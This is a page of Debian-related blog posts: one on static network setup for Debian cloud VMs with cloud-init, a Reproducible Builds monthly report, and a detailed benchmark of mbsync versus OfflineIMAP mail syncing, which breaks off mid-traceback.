Search Results: "ncm"

22 August 2022

Simon Josefsson: Static network config with Debian Cloud images

I self-host some services on virtual machines (VMs), and I'm currently using Debian 11.x as the host machine, relying on the libvirt infrastructure to manage QEMU/KVM machines. While everything has worked fine for years (including on Debian 10.x), there has always been one issue causing a one-minute delay every time I install a new VM: the default images run a DHCP client that never succeeds in my environment. I never found a way to disable DHCP in the image, and none of the documented ways through cloud-init that I have tried worked. A couple of days ago, after reading the AlmaLinux wiki, I found a solution that works with Debian. The following commands create a Debian VM with static network configuration, without the annoying one-minute DHCP delay. The three essential cloud-init keywords are the NoCloud meta-data parameters dsmode: local and the static network-interfaces setting, combined with the user-data bootcmd keyword. I'm using a Raptor CS Talos II ppc64el machine, so replace the image link with a genericcloud amd64 image if you are using x86.
wget https://cloud.debian.org/images/cloud/bullseye/latest/debian-11-generic-ppc64el.qcow2
cp debian-11-generic-ppc64el.qcow2 foo.qcow2
cat>meta-data
dsmode: local
network-interfaces: |
 iface enp0s1 inet static
 address 192.168.98.14/24
 gateway 192.168.98.12
^D
cat>user-data
#cloud-config
fqdn: foo.mydomain
manage_etc_hosts: true
disable_root: false
ssh_pwauth: false
ssh_authorized_keys:
- ssh-ed25519 AAAA...
timezone: Europe/Stockholm
bootcmd:
- rm -f /run/network/interfaces.d/enp0s1
- ifup enp0s1
^D
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --cloud-init meta-data=meta-data,user-data=user-data
Unfortunately virt-install from Debian 11 does not support the cloud-init network-config parameter, so if you want to use a version 2 network configuration with cloud-init (to specify IPv6 addresses, for example) you need to replace the final virt-install command with the following.
cat>network_config_static.cfg
version: 2
ethernets:
  enp0s1:
   dhcp4: false
   addresses: [ 192.168.98.14/24, fc00::14/7 ]
   gateway4: 192.168.98.12
   gateway6: fc00::12
   nameservers:
    addresses: [ 192.168.98.12, fc00::12 ]
^D
cloud-localds -v -m local --network-config=network_config_static.cfg seed.iso user-data
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --disk seed.iso,readonly=on --noreboot
virsh start foo
virsh detach-disk foo vdb --config
virsh console foo
There are still some warnings like the following, but they do not seem to cause any problems: [FAILED] Failed to start Initial cloud-init job (pre-networking). Finally, if you do not want the cloud-init tools installed in your VMs, I found the following set of additional user-data commands helpful. Cloud-init will not be enabled on first boot, and a cron job will be added that purges some unwanted packages.
runcmd:
- touch /etc/cloud/cloud-init.disabled
- apt-get update && apt-get dist-upgrade -uy && apt-get autoremove --yes --purge && printf '#!/bin/sh\n  rm /etc/cloud/cloud-init.disabled /etc/cloud/cloud.cfg.d/01_debian_cloud.cfg && apt-get purge --yes cloud-init cloud-guest-utils cloud-initramfs-growroot genisoimage isc-dhcp-client && apt-get autoremove --yes --purge && rm -f /etc/cron.hourly/cloud-cleanup && shutdown --reboot +1;   2>&1   logger -t cloud-cleanup\n' > /etc/cron.hourly/cloud-cleanup && chmod +x /etc/cron.hourly/cloud-cleanup && reboot &
The production script I'm using is a bit more complicated, but can be downloaded as vello-vm. Happy hacking!

5 February 2022

Reproducible Builds: Reproducible Builds in January 2022

Welcome to the January 2022 report from the Reproducible Builds project. In our reports, we try to outline the most important things that have been happening in the past month. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website.
An interesting blog post was published by Paragon Initiative Enterprises about Gossamer, a proposal for securing the PHP software supply-chain. Utilising code-signing and third-party attestations, Gossamer aims to mitigate the risks within the notorious PHP world by publishing attestations to a transparency log. Their post, titled Solving Open Source Supply Chain Security for the PHP Ecosystem, goes into some detail regarding the design, scope and implementation of the system.
This month, the Linux Foundation announced SupplyChainSecurityCon, a conference focused on exploring the security threats affecting the software supply chain, sharing best practices and mitigation tactics. The conference is part of the Linux Foundation's Open Source Summit North America and will take place June 21st to 24th 2022, both virtually and in Austin, Texas.

Debian There was significant progress made in the Debian Linux distribution this month, including:

Other distributions kpcyrd reported on Twitter about the release of version 0.2.0 of pacman-bintrans, an experiment with binary transparency for the Arch Linux package manager, pacman. This new version is now able to query rebuilderd to check if a package was independently reproduced.
In the world of openSUSE, however, Bernhard M. Wiedemann posted his monthly reproducible builds status report.

diffoscope diffoscope is our in-depth and content-aware diff utility. Not only can it locate and diagnose reproducibility issues, it can provide human-readable diffs from many kinds of binary formats. This month, Chris Lamb prepared and uploaded versions 199, 200, 201 and 202 to Debian unstable (that were later backported to Debian bullseye-backports by Mattia Rizzolo), as well as made the following changes to the code itself:
  • New features:
    • First attempt at incremental output support with a timeout. Now passing, for example, --timeout=60 will mean that diffoscope will not recurse into any sub-archives after 60 seconds of total execution time have elapsed. Note that this is not a fixed/strict timeout due to implementation issues (see the usage sketch below). [ ][ ]
    • Support both variants of odt2txt, including the one provided by the unoconv package. [ ]
  • Bug fixes:
    • Do not return with a UNIX exit code of 0 if we encounter a file whose human-readable metadata matches literal file contents. [ ]
    • Don't fail if comparing a nonexistent file with a .pyc file (and add a test). [ ][ ]
    • If the debian.deb822 module raises any exception on import, re-raise it as an ImportError. This should fix diffoscope on some Fedora systems. [ ]
    • Even if a Sphinx .inv inventory file is labelled The remainder of this file is compressed using zlib, it might not actually be. In this case, don't traceback, and simply return the original content. [ ]
  • Documentation:
    • Improve documentation for the new --timeout option due to a few misconceptions. [ ]
    • Drop reference in the manual page claiming the ability to compare non-existent files on the command-line. (This has not been possible since version 32, which was released in September 2015.) [ ]
    • Update "X has been modified after NT_GNU_BUILD_ID has been applied" messages to, for example, not duplicate the full filename in the diffoscope output. [ ]
  • Codebase improvements:
    • Tidy some control flow. [ ]
    • Correct a recompile typo. [ ]
In addition, Alyssa Ross fixed the comparison of CBFS names that contain spaces [ ], Sergei Trofimovich fixed whitespace for compatibility with version 21.12 of the Black source code reformatter [ ] and Zbigniew Jędrzejewski-Szmek fixed JSON detection with a new version of file [ ].
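As a quick illustration of the new option mentioned above, here is a minimal usage sketch (the .deb filenames are hypothetical; this assumes a diffoscope recent enough to carry the --timeout option):
# Compare two packages, but stop recursing into sub-archives once
# roughly 60 seconds of total execution time have elapsed:
diffoscope --timeout=60 old.deb new.deb > diff.txt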

Testing framework The Reproducible Builds project runs a significant testing framework at tests.reproducible-builds.org, to check packages and other artifacts for reproducibility. This month, the following changes were made:
  • Frédéric Pierret (fepitre):
    • Add Debian bookworm to package set creation. [ ]
  • Holger Levsen:
    • Install the po4a package where appropriate, as it is needed for the Reproducible Builds website job [ ]. In addition, also run the i18n.sh and contributors.sh scripts [ ].
    • Correct some grammar in Debian live image build output. [ ]
    • Shell monitor improvements:
      • Only show the offline node section if there are offline nodes. [ ]
      • Colorise offline nodes. [ ]
      • Shrink screen usage. [ ][ ][ ]
    • Node health check improvements:
      • Detect if live package builds encounter incomplete snapshots. [ ][ ][ ]
      • Detect if a host is running with today's date (when it should be set artificially in the future). [ ]
    • Use the devscripts package from bullseye-backports on Debian nodes. [ ]
    • Use the Munin monitoring package from bullseye-backports on Debian nodes too. [ ]
    • Update New Year handling, needed to be able to detect real and fake dates. [ ][ ]
    • Improve the error message of the script that powercycles the arm64 architecture nodes hosted by Codethink. [ ]
  • Mattia Rizzolo:
    • Use the new --timeout option added in diffoscope version 202. [ ]
  • Roland Clobus:
    • Update the build scripts now that the hooks for live builds are maintained upstream in the live-build repository. [ ]
    • Show info lines in Jenkins when reproducible hooks have been active. [ ]
    • Use unique folders for the artifacts from each live Debian version. [ ]
  • Vagrant Cascadian:
    • Switch the Debian armhf architecture nodes to use new proxy. [ ]
    • Misc. node maintenance. [ ].

Upstream patches The Reproducible Builds project attempts to fix as many currently-unreproducible packages as possible. In January, we wrote a large number of such patches, including:

And finally If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

21 November 2021

Antoine Beaupré: mbsync vs OfflineIMAP

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options, but I figured I would start with a popular one (mbsync). But I also evaluated OfflineIMAP, which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time. Read on for the details.

Benchmark setup All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye. The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive. The server is a custom build with an AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C). The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:
$ notmuch count --exclude=false
372758
$ du -sh --exclude xapian Maildir
13G Maildir
The baseline we are comparing against is SMD (syncmaildir), which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely. Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline. A baseline for a full sync might also be set with rsync, which copies files at nearly 40MB/s, or 317Mbit/s!
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
 12,647,814,731 100%   37.85MB/s    0:05:18 (xfr#394981, to-chk=0/395815)    
72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k
8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps
That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
              0   0%    0.00kB/s    0:00:00 (xfr#0, to-chk=0/395815)    
1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k
120inputs+0outputs (3major+12709minor)pagefaults 0swaps
As an extra curiosity, here's the performance with tar, pretty similar to rsync's, minus incremental syncs, which I cannot be bothered to figure out right now:
anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/ | pv -s 13G | tar xf -
56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k
0inputs+0outputs (0major+7266minor)pagefaults 0swaps
12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%
It is interesting that rsync manages to almost beat a plain tar on file transfer; I'm actually surprised by how well it performs here, considering there are many little files to transfer. (But then again, this may be exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?) Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves a much faster transfer rate on disk:
anarcat@marcos:~$ tar fc - Maildir | pv -s 13G > Maildir.tar
15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%
That's 131MiByte per second, vastly faster than the gigabit link. The client has similar performance:
anarcat@angela:~(main)$ tar fc - Maildir | pv -s 17G > Maildir.tar
16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%
So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways. Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It shows SMD to be faster than OfflineIMAP, but not by as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this, but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirrors, message flags, full folder support, and "trash" functionality.

Complex configuration file I started with this .mbsyncrc configuration file:
SyncState *
Sync New ReNew Flags
IMAPAccount anarcat
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPStore anarcat-remote
Account anarcat
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir-mbsync/
Channel anarcat
# AKA Far, convert when all clients are 1.4+
Master :anarcat-remote:
# AKA Near
Slave :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
Patterns *
# Automatically create missing mailboxes, both locally and on the server
#Create Both
Create slave
# Sync the movement of messages between folders and deletions, add after making sure the sync works
#Expunge Both
Long gone are the days where I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of an "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one, but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian package ships one in /usr/share/doc/isync/examples/mbsyncrc.sample, but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax. Also, that syntax is a little overly complicated. For example, Far needs colons, like:
Far :anarcat-remote:
Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global. Using a more standard format like .INI or TOML could improve that situation.
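To illustrate that last point, here is a purely hypothetical sketch of what the same channel could look like in a TOML-style format. This is a thought experiment only; mbsync supports no such syntax:
# Hypothetical TOML rendering of an mbsync channel (not real mbsync syntax):
[store.anarcat-remote]
type = "imap"
host = "imap.anarc.at"

[store.anarcat-local]
type = "maildir"
inbox = "~/Maildir/"

[channel.anarcat]
far = "anarcat-remote"
near = "anarcat-local"
patterns = ["*"]
Explicit tables and key names like these would make section boundaries and global options unambiguous.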

Stellar performance A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive. It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync. The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.015       0.052       1.930       2.029       2.105       
user        0.660       0.040       0.592       0.661       0.722       
sys         0.338       0.033       0.268       0.341       0.387    
Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m. Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:
120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k
29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps
That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.500       0.087       2.340       2.491       2.629       
user        0.718       0.037       0.679       0.711       0.793       
sys         0.322       0.024       0.284       0.320       0.365
Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There mbsync is worse than the SMD baseline:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        31.531      0.724       30.764      31.271      33.100      
user        1.858       0.125       1.721       1.818       2.131       
sys         0.610       0.063       0.506       0.600       0.695       
That's 30 seconds for a sync, which is an order of magnitude slower than SMD.
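Incidentally, the tables above come from the multitime benchmarking tool; here is a minimal sketch of collecting such numbers (assuming multitime is installed, as packaged in Debian; -n sets the number of runs):
# Run the sync five times and report mean/std.dev/min/median/max:
multitime -n 5 mbsync -a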

Great user interface Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:
anarcat@angela:~(main)$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 1/2  B: 204/205  F: +0/0 *0/0 #0/0  N: +1/200 *0/0 #0/0
(Note that nice switch away from slavery-related terms too.) The display is minimal, and yet informative. It's not obvious what it means at first glance, but the manpage is at least useful for clarifying that:
This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).
In other words:
  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted
You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary of mail traffic in the logs.

Interoperability issue In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:
notmuch search --output=files --format=text0 "$search_spam" \
    | xargs -r -0 mv -t "$HOME/Maildir/${PREFIX}junk/cur/"
This method, which worked fine in SMD (and also OfflineIMAP), created this error on sync:
Maildir error: duplicate UID 37578.
And indeed, there are now two messages with that UID in the mailbox:
anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*'
Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S
This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":
When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir folders. Mutt always does that, while mu4e needs to be configured to do it:
(setq mu4e-change-filenames-when-moving t)
So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above. (A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly; a sketch of that rename follows below.) Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like. Update: I have tried to use afew and found it has significant performance issues. It also has a completely different paradigm to what I am used to: it assumes all incoming mail has a new tag and lays its own tags on top of that (inbox, sent, etc). It can only move files from one folder at a time (see this bug), which breaks my spam training workflow. In general, I sync my tags into folders (e.g. ham, spam, sent) and message flags (e.g. inbox is F, unread is "not S", etc), and afew is not well suited for this (although there are hacks that try to fix this). I have worked hard to make my tagging scripts idempotent, and that is something afew doesn't currently offer. Still, it would be better to have that code in Python than bash, so maybe I should consider my options here.
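Here is a minimal sketch of the manual fix mentioned above, stripping the U= field from one of the duplicate files found earlier so that mbsync assigns a fresh UID on the next sync (my reconstruction, not a command from the original post):
# Remove the ",U=<uid>" part from the duplicate's filename;
# mbsync will generate a new UID and sync correctly afterwards.
f=Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
mv "$f" "$(echo "$f" | sed 's/,U=[0-9]*//')"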

Stability issues The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which led to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect. The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more. Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below), but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile, but that is not trivial because we need to allow SSH and only some parts of it... Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues. Update: upstream actually took the issue very seriously. They not only got CVE-2021-44143 assigned for my bug report, they also audited the code and found several more issues collectively identified as CVE-2021-3657, which actually also affect 1.3 (i.e. Debian 11/bullseye/stable). Somehow my corpus doesn't trigger that issue, but it was still considered serious enough to warrant a CVE. So on the one hand: excellent response from upstream; but on the other hand: how many more of those could there be in there?

Automation with systemd The Arch wiki has instructions on how to set up mbsync as a systemd service. It suggests using the --verbose (-V) flag, which is a little intense here, as it outputs 1444 lines of messages. I have used the following .service file:
[Unit]
Description=Mailbox synchronization service
ConditionHost=!marcos
Wants=network-online.target
After=network-online.target
Before=notmuch-new.service
[Service]
Type=oneshot
ExecStart=/usr/bin/mbsync -a
Nice=10
IOSchedulingClass=idle
NoNewPrivileges=true
[Install]
WantedBy=default.target
And the following .timer:
[Unit]
Description=Mailbox synchronization timer
ConditionHost=!marcos
[Timer]
OnBootSec=2m
OnUnitActiveSec=5m
Unit=mbsync.service
[Install]
WantedBy=timers.target
Note that we trigger notmuch through systemd, with the Before= directive above and also by adding mbsync.service to the notmuch-new.service file:
[Unit]
Description=notmuch new
After=mbsync.service
[Service]
Type=oneshot
Nice=10
ExecStart=/usr/bin/notmuch new
[Install]
WantedBy=mbsync.service
An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seems to be packaged in Debian. It would also not cover the "sent folder" use case, where we need to wake up on local changes.

Password-less setup The sample file suggests this should work:
IMAPStore remote
Tunnel "ssh -q host.remote.com /usr/sbin/imapd"
Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
And it actually seems to work:
$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 0/2  B: 0/1  F: +0/0 *0/0 #0/0  N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied
C: 2/2  B: 205/205  F: +0/0 *0/0 #0/0  N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087
It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well? Interestingly, the SSH setup is not faster than IMAP. With IMAP:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.367       0.065       2.220       2.376       2.458       
user        0.793       0.047       0.731       0.776       0.871       
sys         0.426       0.040       0.364       0.434       0.476
With SSH:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.515       0.088       2.274       2.532       2.594       
user        0.753       0.043       0.645       0.766       0.804       
sys         0.328       0.045       0.212       0.340       0.393
Basically: 200ms slower. Tolerable.

Migrating from SMD The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:
  1. install isync, with the patch:
    dpkg -i isync_1.4.3-1.1~_amd64.deb
    
  2. copy all files over from previous workstation to avoid a full resync (optional):
    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
    
  3. rename all files to match new hostname (optional):
    find Maildir-mbsync/ -type f -name '*.angela,*' -print0 | rename -0 's/\.angela,/\.curie,/'
    
  4. trash the notmuch database (optional):
    rm -rf Maildir-mbsync/.notmuch/xapian/
    
  5. disable all smd and notmuch services:
    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
    
  6. do one last sync with smd:
    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
    
  7. backup notmuch on the client and server:
    notmuch dump | pv > notmuch.dump
    
  8. backup the maildir on the client and server:
    cp -al Maildir Maildir-bak
    
  9. create the SSH key:
    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync
    cat .ssh/id_ed25519_mbsync.pub
    
  10. add to .ssh/authorized_keys on the server, like this: command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...
  11. move old files aside, if present:
    mv Maildir Maildir-smd
    
  12. move new files in place (CRITICAL SECTION BEGINS!):
    mv Maildir-mbsync Maildir
    
  13. run a test sync, only pulling changes: mbsync --create-near --remove-none --expunge-none --noop anarcat-register
  14. if that works well, try with all mailboxes: mbsync --create-near --remove-none --expunge-none --noop -a
  15. if that works well, try again with a full sync: mbsync register, then mbsync -a
  16. reindex and restore the notmuch database, this should take ~25 minutes:
    notmuch new
    pv notmuch.dump | notmuch restore
    
  17. enable the systemd services and retire the smd-* services:
    systemctl --user enable mbsync.timer notmuch-new.service
    systemctl --user start mbsync.timer
    rm ~/.config/systemd/user/smd*
    systemctl daemon-reload
During the migration, notmuch helpfully told me the full list of those lost messages:
[...]
Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com
Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com
Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com
[...]
Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org
Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org
Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47
Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d
Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d
Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c
Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562
Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13
[...]
As detailed in the crash report, all of those were actually innocuous and could be ignored. Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than to let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:
nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.).
nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.
A reindexing on top of an existing database, by contrast, went about twice as slow, at about 120 files/sec.

Current config file Putting it all together, I ended up with the following configuration file:
SyncState *
Sync All
# IMAP side, AKA "Far"
IMAPAccount anarcat-imap
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-remote
Account anarcat-tunnel
# Maildir side, AKA "Near"
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir/
# what binds Maildir and IMAP
Channel anarcat
Far :anarcat-remote:
Near :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
#Patterns *
Patterns * !register  !.register
# Automatically create missing mailboxes, both locally and on the server
Create Both
#Create Near
# Sync the movement of messages between folders and deletions, add after making sure the sync works
Expunge Both
# Propagate mailbox deletion
Remove both
IMAPAccount anarcat-register-imap
Host imap.anarc.at
User register
PassCmd "pass imap.anarc.at-register"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-register-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-register-remote
Account anarcat-register-tunnel
MaildirStore anarcat-register-local
SubFolders Maildir++
Inbox ~/Maildir/.register/
Channel anarcat-register
Far :anarcat-register-remote:
Near :anarcat-register-local:
Create Both
Expunge Both
Remove both
Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that. It also kind of died in a fire when Python 2 stopped being maintained. The main author moved on to a different project, imapfw, which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync The first thing that happened on a full sync is this crash:
Copy message from RemoteAnarcat:junk:
 ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Thread 'Copy message from RemoteAnarcat:junk' terminated with exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode
    for c in binary.decode():
AttributeError: 'memoryview' object has no attribute 'decode'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run
    Thread.run(self)
  File "/usr/lib/python3.9/threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
